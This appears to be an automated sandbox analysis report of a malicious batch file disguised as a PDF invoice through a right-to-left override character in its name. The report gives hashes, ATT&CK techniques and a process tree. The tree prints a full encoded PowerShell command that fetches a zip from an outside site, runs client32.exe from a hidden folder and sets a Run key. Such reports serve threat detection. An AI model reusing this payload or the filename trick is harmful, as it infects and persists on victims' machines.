9d058af41ce79083560c772014ab63bafd8de6d584b313749c78e5dcfab46f0c

General

Target

Rechnung t‮fdp.bat
Size

80B
MD5

74519b998ff28949d9832d83ae2b762d
SHA1

958a9c7b79836263e4faa9c453396edf57cbf0af
SHA256

3fe0959462a072cc684bad5738419f1f040caca84477a184fdd719ad0a3b21aa
SHA512

72d186c5dbdca6c266dc5f1e33de485df98bc8b619e795f5211830767fe04b7ed5808869c657779e32cd0afbc77a9f70eaaceced59e3c9b5cedddb31c45039b5

Score

10^/10

persistence

Malware Config

Extracted

Language

ps1

Source

URLs

exe.dropper

https://this-is-vip.site/trs.zip

Signatures

Adds Run key to start application 2 TTPs 1 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-2805025096-2326403612-4231045514-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ONEN0TEupdate = "C:\\Users\\Admin\\AppData\\Roaming\\ONEN0TEupdate\\client32.exe"	powershell.exe

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
4136	powershell.exe
4136	powershell.exe
4212	powershell.exe
4212	powershell.exe

Suspicious use of AdjustPrivilegeToken 2 IoCs

description	pid	Process
Token: SeDebugPrivilege	4136	powershell.exe
Token: SeDebugPrivilege	4212	powershell.exe

Suspicious use of WriteProcessMemory 4 IoCs

description	pid	Process	procid_target
PID 1232 wrote to memory of 4136	1232	cmd.exe	85
PID 1232 wrote to memory of 4136	1232	cmd.exe	85
PID 4136 wrote to memory of 4212	4136	powershell.exe	86
PID 4136 wrote to memory of 4212	4136	powershell.exe	86

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Rechnung t‮fdp.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1232
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell.exe -ExecutionPolicy Bypass -File ".\SM.ps1"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:4136
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nop -ep bypass -windowstyle minimized -enc YwBkACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAOwAgACQAbABpAG4AawA9ACIAaAB0AHQAcABzADoALwAvAHQAaABpAHMALQBpAHMALQB2AGkAcAAuAHMAaQB0AGUALwB0AHIAcwAuAHoAaQBwACIAOwAgACQAcABhAHQAaAA9ACQAZQBuAHYAOgBBAFAAUABEAEEAVABBACsAIgBcAHQAcgB0AC4AegBpAHAAIgA7ACAAJABwAHoAaQBwAD0AJABlAG4AdgA6AEEAUABQAEQAQQBUAEEAKwAiAFwATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQAiADsAIABTAHQAYQByAHQALQBCAGkAdABzAFQAcgBhAG4AcwBmAGUAcgAgAC0AUwBvAHUAcgBjAGUAIAAkAGwAaQBuAGsAIAAtAEQAZQBzAHQAaQBuAGEAdABpAG8AbgAgACQAUABhAHQAaAA7ACAAZQB4AHAAYQBuAGQALQBhAHIAYwBoAGkAdgBlACAALQBwAGEAdABoACAALgBcAHQAcgB0AC4AegBpAHAAIAAtAGQAZQBzAHQAaQBuAGEAdABpAG8AbgBwAGEAdABoACAAJABwAHoAaQBwADsAIAAkAEYATwBMAEQAPQBHAGUAdAAtAEkAdABlAG0AIAAkAHAAegBpAHAAIAAtAEYAbwByAGMAZQA7ACAAJABGAE8ATABEAC4AYQB0AHQAcgBpAGIAdQB0AGUAcwA9ACcASABpAGQAZABlAG4AJwA7ACAAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBwAGEAdABoACAAJABwAGEAdABoADsAIABjAGQAIAAkAHAAegBpAHAAOwAgAHMAdABhAHIAdAAgAGMAbABpAGUAbgB0ADMAMgAuAGUAeABlADsAIAAkAGYAcwB0AHIAPQAkAHAAegBpAHAAKwAiAFwAYwBsAGkAZQBuAHQAMwAyAC4AZQB4AGUAIgA7ACAATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACIASABLAEMAVQA6AFwAUwBPAEYAVABXAEEAUgBFAFwATQBpAGMAcgBvAHMAbwBmAHQAXABXAGkAbgBkAG8AdwBzAFwAQwB1AHIAcgBlAG4AdABWAGUAcgBzAGkAbwBuAFwAUgB1AG4AIgAgAC0ATgBhAG0AZQAgACIATwBOAEUATgAwAFQARQB1AHAAZABhAHQAZQAiACAALQBWAGEAbAB1AGUAIAAkAGYAcwB0AHIAIAAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIAAiAFMAdAByAGkAbgBnACIAOwA=
    3⤵
    - Adds Run key to start application
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:4212

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
1⤵
PID:2204

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Registry Run Keys / Startup Folder

1

T1060

Privilege Escalation

Defense Evasion

Modify Registry

1

T1112

Credential Access

Discovery

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
3KB

MD5
7f3eefe85bfa5a7893d2fd007bfc8695

SHA1
06be01e43200fe7ed58abd49a0477a52aece68ab

SHA256
63389a084cd07bfae485891e3639843c77c6e870124a84f41568c824522751c7

SHA512
43fd1dc2ab3cd21865e6d03b8e0494d6924fdd4056ea6b60c41638dd57dd246168a4e1652eaa005c3f95cb95a8d07bfcbf41c9df81f568278939a100dda006a0

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
64B

MD5
feadc4e1a70c13480ef147aca0c47bc0

SHA1
d7a5084c93842a290b24dacec0cd3904c2266819

SHA256
5b4f1fe7ba74b245b6368dbe4ceffa438f14eef08ba270e9a13c57505c7717ac

SHA512
c9681a19c773891808fefa9445cea598d118c83bba89530a51ab993adbff39bce72b43f8e99d0c68e4a44f7e0f4c8ec128641c45cd557a8e1215721d5d992a23

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uydi23fy.ga5.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
memory/4136-134-0x0000023278500000-0x0000023278522000-memory.dmp

Filesize
136KB

Download
memory/4136-144-0x00000232784E0000-0x00000232784F0000-memory.dmp

Filesize
64KB

Download
memory/4136-145-0x000002327B670000-0x000002327B774000-memory.dmp

Filesize
1.0MB

Download
memory/4136-156-0x00000232784C0000-0x00000232784D0000-memory.dmp

Filesize
64KB

Download
memory/4136-157-0x00000232784C0000-0x00000232784D0000-memory.dmp

Filesize
64KB

Download
memory/4136-133-0x000002327B3D0000-0x000002327B456000-memory.dmp

Filesize
536KB

Download
memory/4136-155-0x00000232784C0000-0x00000232784D0000-memory.dmp

Filesize
64KB

Download
memory/4212-158-0x000001E545510000-0x000001E545524000-memory.dmp

Filesize
80KB

Download
memory/4212-161-0x000001E545540000-0x000001E545548000-memory.dmp

Filesize
32KB

Download
memory/4212-162-0x000001E52A650000-0x000001E52A660000-memory.dmp

Filesize
64KB

Download
memory/4212-163-0x000001E545570000-0x000001E545586000-memory.dmp

Filesize
88KB

Download
memory/4212-164-0x000001E5455B0000-0x000001E5455CE000-memory.dmp

Filesize
120KB

Download
memory/4212-160-0x000001E52A650000-0x000001E52A660000-memory.dmp

Filesize
64KB

Download
memory/4212-159-0x000001E52A650000-0x000001E52A660000-memory.dmp

Filesize
64KB

Download

Analysis

Sharing